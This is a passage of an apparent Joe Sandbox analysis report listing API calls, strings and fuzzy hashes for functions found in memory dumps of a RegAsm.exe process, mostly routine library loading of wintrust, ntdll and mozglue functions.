                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                      • API String ID: 3217676052-1401603581
                                                                                      • Opcode ID: b82a6bd843cd5d248d1811b85a62e5bd19b8902f9af255f352663941db65ff98
                                                                                      • Instruction ID: 44c63c70fad2b3f25464980a08362f3b1346128498278b555fc7042412d099d7
                                                                                      • Opcode Fuzzy Hash: b82a6bd843cd5d248d1811b85a62e5bd19b8902f9af255f352663941db65ff98
                                                                                      • Instruction Fuzzy Hash: 2E213436B08540EBCA14CFABC819FA973B5FB46338F05C52AE8158BF40C735A802D6D5
                                                                                      APIs
                                                                                      • SearchPathW.KERNEL32(?,6C10BFBD,.dll,00000000,00000000,00000000,6C10BFBD), ref: 6C14ABBD
                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6C14ABD8
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C14ABEB
                                                                                      • SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6C14AC03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch$mallocmemsetmoz_xmalloc
                                                                                      • String ID: .dll
                                                                                      • API String ID: 3063185715-2738580789
                                                                                      • Opcode ID: 1ea31e899dd60fa1f5158c70495a855198d3e6e3b59415009e05a84077cbe007
                                                                                      • Instruction ID: ec829bd3cec802bcd1f5eed94e8437dfd5cb17008873cb5b62095e335d08bee4
                                                                                      • Opcode Fuzzy Hash: 1ea31e899dd60fa1f5158c70495a855198d3e6e3b59415009e05a84077cbe007
                                                                                      • Instruction Fuzzy Hash: 4801F5B2A0010A6FEB019E798C49BBFB7ADEF85354F054035FC04D3600E7769C544BA1
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16F770,-00000001,?,6C15E330,?,6C10BDF7), ref: 6C14A7AF
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C10BDF7), ref: 6C14A7C2
                                                                                      • moz_xmalloc.MOZGLUE(00000018,?,6C10BDF7), ref: 6C14A7E4
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F770), ref: 6C14A80A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                      • String ID: accelerator.dll
                                                                                      • API String ID: 2442272132-2426294810
                                                                                      • Opcode ID: 8a9156871b9898c604cb41ce415881d87a10d0a66f80da471922a7e33899f07e
                                                                                      • Instruction ID: d7c20d63e5ab113c38c35080e74031b1749c5415928bae827b5b5b35a666e763
                                                                                      • Opcode Fuzzy Hash: 8a9156871b9898c604cb41ce415881d87a10d0a66f80da471922a7e33899f07e
                                                                                      • Instruction Fuzzy Hash: ED01A2B16003049FDF04CF56D884E21B7B8FB8A316706C07AE9198B701DB71A810DBA0
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ole32,?,6C0EEE51,?), ref: 6C0EF0B2
                                                                                      • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C0EF0C2
                                                                                      Strings
                                                                                      • Could not find CoTaskMemFree, xrefs: 6C0EF0E3
                                                                                      • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C0EF0DC
                                                                                      • ole32, xrefs: 6C0EF0AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                      • API String ID: 2574300362-1578401391
                                                                                      • Opcode ID: 3bfb20f66e9efb3b1a369536cc13f521f301b5a8d9056295f1006bf654cbd532
                                                                                      • Instruction ID: 58dc613debffbcbeca8b3c7a1284527ca47165bee15c6370b24585466fc841e4
                                                                                      • Opcode Fuzzy Hash: 3bfb20f66e9efb3b1a369536cc13f521f301b5a8d9056295f1006bf654cbd532
                                                                                      • Instruction Fuzzy Hash: AAE04F717853019FAF045AA7A81CB3A37FD6B1A20D324842EF512D1E00EB21D420E672
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7204), ref: 6C120088
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C1200A7
                                                                                      • FreeLibrary.KERNEL32(?,6C0F7204), ref: 6C1200BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                      • API String ID: 145871493-3385133079
                                                                                      • Opcode ID: 6c865928e6e065b0cd0bbf5e0b529c7b5b014e6c129b9d6fd19affff24a6a2bf
                                                                                      • Instruction ID: 9555705fcc46607b3efc74d28366cd249220ebf58cb943debb009fd3ded11c17
                                                                                      • Opcode Fuzzy Hash: 6c865928e6e065b0cd0bbf5e0b529c7b5b014e6c129b9d6fd19affff24a6a2bf
                                                                                      • Instruction Fuzzy Hash: EDE092786417059BEF10AF67D818735BAFCA70B389F104156A925C2B51EBB9C060BB15
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7235), ref: 6C1200D8
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C1200F7
                                                                                      • FreeLibrary.KERNEL32(?,6C0F7235), ref: 6C12010E
                                                                                      Strings
                                                                                      • wintrust.dll, xrefs: 6C1200D3
                                                                                      • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C1200F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                      • API String ID: 145871493-2559046807
                                                                                      • Opcode ID: 1a66ce603c9d6493553ba146064a39447bca735c6d1a0eb524a3e03ae14a6f5a
                                                                                      • Instruction ID: de20dc6ebbb47fa03c2922b92746bfed3a0dcbde42a06b0de9c6477335f1624d
                                                                                      • Opcode Fuzzy Hash: 1a66ce603c9d6493553ba146064a39447bca735c6d1a0eb524a3e03ae14a6f5a
                                                                                      • Instruction Fuzzy Hash: 23E0B6787453169BEF009F6BCA197317AFEB747249F544456AD6A81B40EBB8C0A0FB10
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7297), ref: 6C120128
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C120147
                                                                                      • FreeLibrary.KERNEL32(?,6C0F7297), ref: 6C12015E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                      • API String ID: 145871493-1536241729
                                                                                      • Opcode ID: c1e54cdaedc26627d9922119e3bfc8411a26026d46fc2f0354b237fd1bb8945c
                                                                                      • Instruction ID: 9aebe74ffe3f9502e2ccd6884c4d98148517d08aa8bcb203d2976404dc58c77f
                                                                                      • Opcode Fuzzy Hash: c1e54cdaedc26627d9922119e3bfc8411a26026d46fc2f0354b237fd1bb8945c
                                                                                      • Instruction Fuzzy Hash: D2E01A746052459BEF005F2BD91C7223EFCA703308F004155A915C2B00D775C064BB10
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7308), ref: 6C120178
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C120197
                                                                                      • FreeLibrary.KERNEL32(?,6C0F7308), ref: 6C1201AE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                      • API String ID: 145871493-3354427110
                                                                                      • Opcode ID: 3bb7efd068f099e7a51accd323858a964b800b696a7c72af5c0439fe68102210
                                                                                      • Instruction ID: 328ec714d0ed52cedba9b9a70e80ce2bdcf6b0dce8165849be033387e01a5884
                                                                                      • Opcode Fuzzy Hash: 3bb7efd068f099e7a51accd323858a964b800b696a7c72af5c0439fe68102210
                                                                                      • Instruction Fuzzy Hash: B0E09A746852059BEF405F67C918B217BFCB757249F100096E9A581B40E778C0E0FA20
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7266), ref: 6C1201C8
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C1201E7
                                                                                      • FreeLibrary.KERNEL32(?,6C0F7266), ref: 6C1201FE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                      • API String ID: 145871493-1489773717
                                                                                      • Opcode ID: d907dd5214ba8a251642c5fa101ff17d2a22629fe3f87eb6366a64c397333397
                                                                                      • Instruction ID: 17664b91517ab2c41a5254c84675cc1a10b9dc40803fa890a222050e5cdd3336
                                                                                      • Opcode Fuzzy Hash: d907dd5214ba8a251642c5fa101ff17d2a22629fe3f87eb6366a64c397333397
                                                                                      • Instruction Fuzzy Hash: D3E09A756813859BEF009F67C91C7227AFCAB17349F504559E925C1B81DB74C060BB10
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C14C0E9), ref: 6C14C418
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C14C437
                                                                                      • FreeLibrary.KERNEL32(?,6C14C0E9), ref: 6C14C44C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                      • API String ID: 145871493-2623246514
                                                                                      • Opcode ID: 93a8d6bc48e4a78a83927e1171a0875ba546a0ace3220f09299bc2b853034848
                                                                                      • Instruction ID: 9b416b3d19803837be112a5a9475e1cc32bbf28a87adb5f8db6643dad3053efe
                                                                                      • Opcode Fuzzy Hash: 93a8d6bc48e4a78a83927e1171a0875ba546a0ace3220f09299bc2b853034848
                                                                                      • Instruction Fuzzy Hash: F9E092B06013019BDB006B738A287397AFCB756208F049156AA2491B00EBB5C034AA50
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C14748B,?), ref: 6C1475B8
                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C1475D7
                                                                                      • FreeLibrary.KERNEL32(?,6C14748B,?), ref: 6C1475EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                      • API String ID: 145871493-3641475894
                                                                                      • Opcode ID: 4b5d3af81fe58d947985054a5ba1a6bf05bd990ae0ff51fd9f7fc6962ecc0244
                                                                                      • Instruction ID: 7cf8cde5f7a7053dd6c8fb995a5155be4ee99360961747652cd965f32ad6d3d4
                                                                                      • Opcode Fuzzy Hash: 4b5d3af81fe58d947985054a5ba1a6bf05bd990ae0ff51fd9f7fc6962ecc0244
                                                                                      • Instruction Fuzzy Hash: 68E0B672704311ABEF006FA3C859721BAF8EB07219F108026F915D5A00EBB48055FF50
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C147592), ref: 6C147608
                                                                                      • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C147627
                                                                                      • FreeLibrary.KERNEL32(?,6C147592), ref: 6C14763C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                      • API String ID: 145871493-1050664331
                                                                                      • Opcode ID: 70edc0806ab9466ff8fe3027e7712d16776c2fc24ba2310777d8b7043fbb469d
                                                                                      • Instruction ID: 4d4e229805260c7e218bbf7d9ef6a35583f7f45c03c400a1a0aa9c185e819569
                                                                                      • Opcode Fuzzy Hash: 70edc0806ab9466ff8fe3027e7712d16776c2fc24ba2310777d8b7043fbb469d
                                                                                      • Instruction Fuzzy Hash: 61E0B6B5700301ABEF006FA7C808721BAB9E72A35AF00D126E915D2B00E7B4C015FF58
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C14C1DE,?,00000000,?,00000000,?,6C0F779F), ref: 6C14C1F8
                                                                                      • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C14C217
                                                                                      • FreeLibrary.KERNEL32(?,6C14C1DE,?,00000000,?,00000000,?,6C0F779F), ref: 6C14C22C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: WinVerifyTrust$wintrust.dll
                                                                                      • API String ID: 145871493-2991032369
                                                                                      • Opcode ID: 7351b3e18e6191fd34cac3c6b66cd717885bcd22cff0c7bccb49a0b2a4617a36
                                                                                      • Instruction ID: 4b09dd20521b04f4d701a5e36a2b2ad9067689de564286d119faaf7593f43460
                                                                                      • Opcode Fuzzy Hash: 7351b3e18e6191fd34cac3c6b66cd717885bcd22cff0c7bccb49a0b2a4617a36
                                                                                      • Instruction Fuzzy Hash: 06E0B6B57013419BDF00BF63C918B227EFCBB56208F004555A924C1B91E7B08024BB51
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F77F6), ref: 6C14C248
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C14C267
                                                                                      • FreeLibrary.KERNEL32(?,6C0F77F6), ref: 6C14C27C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                                      • API String ID: 145871493-3357690181
                                                                                      • Opcode ID: aae85e47d49fa5379e59a8794c2114f6f343e1908d60bbf4aef9300079bd0028
                                                                                      • Instruction ID: 0ca09fe5c3a4a4214b811ffc05d29e3f33efa15fe86cf1f3486b876cb90f5d6d
                                                                                      • Opcode Fuzzy Hash: aae85e47d49fa5379e59a8794c2114f6f343e1908d60bbf4aef9300079bd0028
                                                                                      • Instruction Fuzzy Hash: C4E092746042059BDF04AF63E818B227AFCA70B308F114295F934C2701E7B08064BB60
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F77C5), ref: 6C14C298
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C14C2B7
                                                                                      • FreeLibrary.KERNEL32(?,6C0F77C5), ref: 6C14C2CC
                                                                                      Strings
                                                                                      • wintrust.dll, xrefs: 6C14C293
                                                                                      • CryptCATAdminCalcHashFromFileHandle, xrefs: 6C14C2B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                      • API String ID: 145871493-1423897460
                                                                                      • Opcode ID: d81e2dd9fee2a03fe4912ebc75c2435713786ee7589c6eb31b07f207ec3876a8
                                                                                      • Instruction ID: acde26ba778eb9ed93e94fb3398da250ff75c53f2bfc21b937d2008ba778bcd4
                                                                                      • Opcode Fuzzy Hash: d81e2dd9fee2a03fe4912ebc75c2435713786ee7589c6eb31b07f207ec3876a8
                                                                                      • Instruction Fuzzy Hash: 5CE092746412019FDF006B6BC918B227AFCFB16208F544455AD2481B10EBB18028EB50
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0F05BC), ref: 6C14BAB8
                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C14BAD7
                                                                                      • FreeLibrary.KERNEL32(?,6C0F05BC), ref: 6C14BAEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: VirtualAlloc2$kernelbase.dll
                                                                                      • API String ID: 145871493-1188699709
                                                                                      • Opcode ID: fa0a6976cb6bf4c0a75ad14f6275771ca64e958b6953adc4b71b4bbf68a532b5
                                                                                      • Instruction ID: d805fcd0e7a1f9b897b93b59162d5e6920ec71e5fe32538da22fed2b7104a912
                                                                                      • Opcode Fuzzy Hash: fa0a6976cb6bf4c0a75ad14f6275771ca64e958b6953adc4b71b4bbf68a532b5
                                                                                      • Instruction Fuzzy Hash: ABE0B6703053829BDF409F63C92C7257BFCA746208F24405AB91581B44EBB88074BB10
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,6C14BE49), ref: 6C14BEC4
                                                                                      • RtlCaptureStackBackTrace.NTDLL ref: 6C14BEDE
                                                                                      • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C14BE49), ref: 6C14BF38
                                                                                      • RtlReAllocateHeap.NTDLL ref: 6C14BF83
                                                                                      • RtlFreeHeap.NTDLL ref: 6C14BFA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                      • String ID:
                                                                                      • API String ID: 2764315370-0
                                                                                      • Opcode ID: 9f93ba8e7bc44d39778624ea60a597fa647cf52034f086a0f6f857c6c4cb3c16
